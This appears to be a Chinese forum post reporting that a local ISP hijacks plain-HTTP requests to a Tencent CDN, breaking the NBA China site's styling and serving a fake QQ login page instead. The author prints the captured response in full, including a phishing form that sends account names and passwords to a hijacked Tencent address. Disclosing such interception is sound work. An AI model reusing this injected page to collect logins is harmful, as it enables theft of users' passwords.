本地运营商的中间人攻击越来越严重, 现在不只劫持大站做广告, 还偷窃密码

NBA 中国官网目前和腾讯合作, 但是没有全站 HTTPS.

其中有一个 CSS 地址为 http://mat1.gtimg.com/chinanba/web/styles/css_a335ff.css 因为中间人对 http://mat1.gtimg.com/ 开启无差别劫持, 所以这个地址遭殃, 导致 NBA 中国官网失去样式.

我尝试访问 http://mat1.gtimg.com/hehe 这样的地址或 http://mat1.gtimg.com/fdsgw95tjioaesmckjsdbhjCVriwh 这样的地址, 都得到了一个结果:

Request URL:http://mat1.gtimg.com/chinanba/web/styles/css_a335ff.css Request Method:GET Status Code:200 OK Remote Address:222.142.18.246:80 Referrer Policy:no-referrer-when-downgrade Cache-Control:no-cache Connection:Close Content-Length:30166 Content-Type:text/html; charset= Date:web, 21 Aug 2013 03:09:04 GMT Server:ngix/2.0 <script type="text/Javascript"> var g_time={};g_time.time3=new Date().getTime();(function(){window.Onerror=function(E,B,A){if(location.protocol=="https:"){return }var C=document.createElement("img");var D=encodeURIComponent(E+"|_|"+B+"|_|"+A+"|_|"+window.navigator.userAgent);C.src="http://badjs.qq.com/cgi-bin/js_report?bid=110&mid=195279&msg="+D+"&v="+Math.random();C=null}})();document.domain="qq.com";var g_cdn_js_fail=false;var pt={};pt.str={no_uin:"您还没有输入帐号！",no_pwd:"您还没有输入密码！",no_vcode:"您还没有输入验证码！",inv_uin:"请输入正确的 QQ 帐号！",inv_vcode:"请输入完整的验证码！",switch_qlogin:"切换到快速登录模式",switch_normal:"使用其他号码登录",qlogin_no_uin:"系统检测到您机器上 QQ 未启动或已被锁定。请您先登录 QQ 或解锁后再使用本功能。",qlogin_other_err:"快速登录失败，请您返回重试或切换到普通登录模式。",qlogin_select_offline:"您所选择号码对应的 QQ 已经失效，请检查该号码对应的 QQ 是否已经被关闭。",qlogining:"正在登录中，请稍候……",yjfk:"意见反馈",h_q_login_qr:"二维码登录",h_pt_login_qr:"帐号密码登录",h_pt_login:"其他帐号登录",h_other_login:"帐号登录",h_uintip:"QQ 号码 /手机 /邮箱",h_uintip_focus:"QQ 号码 /手机 /邮箱",h_passtip:"密码",h_passtip_focus:"密码",h_codetip:"验证码",h_codetip_focus:"输入右图字符不区分大小写",h_login_tip:"请登录新增帐号",h_loading_wording:"登录中",h_input_err:"您输入有误，请重试",pt_qr_app:"手机 QQ 空间",pt_qr_link:"http://z.qzone.com/download.html"};pt.ptui={s_url:"",proxy_url:"",no_drop_domain:"0",jumpname:encodeURIComponent(""),mibao_css:encodeURIComponent(""),qlogin_param:"",defaultUin:"",href:"http\x3A\x2F\x2Fui.ptlogin2.qq.com\x2Fcgi-bin\x2Flogin\x3Fhide_title_bar\x3D1\x26low_login\x3D0\x26qlogin_auto_login\x3D1\x26no_verifyimg\x3D1\x26link_target\x3Dblank\x26appid\x3D549000912\x26style\x3D12\x26target\x3Dself\x26s_url\x3Dhttp\x253A\x2F\x2Fqzs.qq.com\x2Fqzone\x2Fv5\x2Floginsucc.html\x3Fpara\x3Dizone\x26pt_qr_app\x3D\x25CA\x25D6\x25BB\x25FAQQ\x25BF\x25D5\x25BC\x25E4\x26pt_qr_link\x3Dhttp\x253A\x2F\x2Fz.qzone.com\x2Fdownload.html\x26self_regurl\x3Dhttp\x253A\x2F\x2Fqzs.qq.com\x2Fqzone\x2Fv6\x2Freg\x2Findex.html\x26pt_qr_help_link\x3Dhttp\x253A\x2F\x2Fz.qzone.com\x2Fdownload.html",login_sig:"vWVbvKqFLQEdmDVI8GoVj2w20UKKxW52jPUAOjK7L4pXmutWujFbrETGbdL4FNKC",clientip:"d4ed7aeae844fd5a",serverip:"76dfac118b6ed451",version:"201309110930",ptui_version:encodeURIComponent("10045"),isHttps:false,cssPath:"http://imgcache.qq.com/ptlogin/v4/style/12",domain:encodeURIComponent("qq.com"),appid:encodeURIComponent("549000912"),lang:encodeURIComponent("2052"),style:encodeURIComponent("12"),qtarget:encodeURIComponent("-1"),low_login:encodeURIComponent("0"),daid:encodeURIComponent(""),regmaster:encodeURIComponent(""),enable_qlogin:"1",pt_size:"0",noAuth:"0",target:encodeURIComponent("_self"),csimc:encodeURIComponent("0"),csnum:encodeURIComponent("0"),authid:encodeURIComponent("0"),auth_mode:encodeURIComponent("0")}; </script> </head> <body> <div class="login" id="login" style="border: 0px;"> <div id="header" class="header"> <div class="switch" id="switch"> <a class="switch_btn_focus" id="switch_qlogin" href="Javascript:void(0);" tabindex="7"> 安全通道登录</a> <div class="switch_bottom" id="switch_bottom"> </div> </div> </div> <!--快速登录--> <div class="qlogin" id="qlogin"> </div> <!--快速登录 end--> <!--普通登录和二维码登录--> <!--二维码登录切换--> <div class="qrswitch" id="qrswitch"> <a class="qrswitch_logo" id="qrswitch_logo" href="Javascript:void(0)" draggable="false" title="二维码登录"></a> </div> <!--二维码登录切换 end--> <div class="web_qr_login" id="web_qr_login"> <!--为了动画--> <div class="web_qr_login_show" id="web_qr_login_show"> <!--普通登录--> <div class="web_login" id="web_login"> <div class="login_form"> <form id="loginform" autocomplete="off" name="loginform" action="http://t.qq.com/QQWeiboLogin.jsp" method="post" target="_top" style="margin: 0px;"> <div class="uinArea" id="uinArea"> <div class="inputOuter"> <input type="text" class="inputstyle" placeholder="QQ 号码 /手机 /邮箱" id="u" name="u" value="" tabindex="1" /> <a class="uin_del" id="uin_del" href="Javascript:void(0);"></a> <input type="hidden" name="apptype" value="qqweibo" /> </div> <ul class="email_list" id="email_list"> </ul> </div> <div class="pwdArea" id="pwdArea"> <div class="inputOuter"> <input type="password" class="inputstyle password" placeholder="密码" id="p" name="p" value="" maxlength="16" tabindex="2" /> </div> <div class="lock_tips" id="caps_lock_tips"> <span class="lock_tips_row"></span><span>大写锁定已打开 </span> </div> </div> <div class="verifyArea" id="verifyArea"> <div class="verifyinputArea" id="verifyinputArea"> <label class="input_tips" id="vc_tips" for="verifycode"> 验证码</label> <div class="inputOuter"> <input name="verifycode" type="text" class="inputstyle verifycode" id="verifycode" value="" maxlength="5" tabindex="3" /> </div> </div> <div class="verifyimgArea" id="verifyimgArea"> <img class="verifyimg" id="verifyimg" title="看不清，换一张" /> <a tabindex="4" href="Javascript:void(0);" class="verifyimg_tips">看不清，换一张</a> </div> </div> <div class="submit"> <a class="login_button" href="Javascript:void(0);"> <input type="submit" tabindex="6" value="登 录" class="btn" id="login_button"/> </a> </div> <input type="hidden" name="aid" value="549000912" /> <input type="hidden" name="u1" value="http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone" /> <input type="hidden" name="fp" value="" /> <input type="hidden" name="h" value="1" /> <input type="hidden" name="ptredirect" value="0" /> <input type="hidden" name="ptlang" value="2052" /> <input type="hidden" name="from_ui" value="1" /> <input type="hidden" name="dumy" value="" /> </form> </div> <div class="bottom" id="bottom_web"> <a href="http://ptlogin2.qq.com/ptui_forgetpwd" class="link" id="forgetpwd" target="_blank"> 忘了密码？</a> <span class="dotted">|</span> <a href="http://qzs.qq.com/qzone/v6/reg/index.html" class="link" target="_blank">注册空间</a> <span class="dotted">|</span> <a class="link" id="feedback_web" href="http://support.qq.com/write.shtml?guest=1&fid=713&SSTAG=hailunna" target="_blank">意见反馈</a> </div> </div> <!--普通登录 end--> </div> <!--showArea end--> </div> <!--二维码登录和普通登录--> <div class="bottom hide" id="bottom_qlogin"> <a href="Javascript:void(0);" class="link vip_link" id="vip_link2" target="_blank">开通 QQ 会员</a> <span class="dotted" id="vip_dot">|</span> <a href="http://qzs.qq.com/qzone/v6/reg/index.html" class="link" target="_blank">注册空间</a> <span class="dotted">|</span> <a class="link" id="feedback_qlogin" href="http://support.qq.com/write.shtml?guest=1&fid=713&SSTAG=hailunna" target="_blank">意见反馈</a> </div> <!--授权登录--> <div id="authLogin" class="authLogin"> <div class="authHeader" id="authHeader"> <div class="logo"> </div> <span class="title">腾讯业务 </span> </div> <div class="authTips"> </div> <div class="authWording"> <span><span>点击头像，确认</span><span>腾讯业务</span> </span> </div> <div class="authInfo"> <a class="face" id="auth_area" tabindex="1" href="Javascript:void(0);" draggable="false" hidefocus="true"> <img id="auth_face" /> <span id="auth_mengban" class=""></span><span class="uin" id="auth_uin"></span><span class="img_out_focus"></span><span class="nick" id="auth_nick"></span></a> </div> <div class="cancleAuthOuter" id="cancleAuthOuter"> <a id="cancleAuth" class="cancleAuth">使用其他帐号 </a> </div> <div class="bottom"> <a class="link feedback_authLogin" id="feedback_authLogin" href="http://support.qq.com/write.shtml?guest=1&fid=713&SSTAG=hailunna" target="_blank">意见反馈</a> </div> </div> </div> <!--11--> <div id="proxy" class="hide"> </div> </body> </html> 

可见攻击者的主要目标是通过 http://t.qq.com/QQWeiboLogin.jsp 这个相比也被劫持的地址来窃取用户的腾讯会员密码.

运营商, 你有点过分了昂.

Q: 你确认是运营商的锅, 不是你终端的问题? A: 我确定. 上文我暴露了攻击者用的一个 IP, 不知道这个 IP 是否也是受害者. 这个 IP 归属某小城市某运营商, 和我所在地区相符; 当我同一终端使用其他网络的时候, 没有这问题.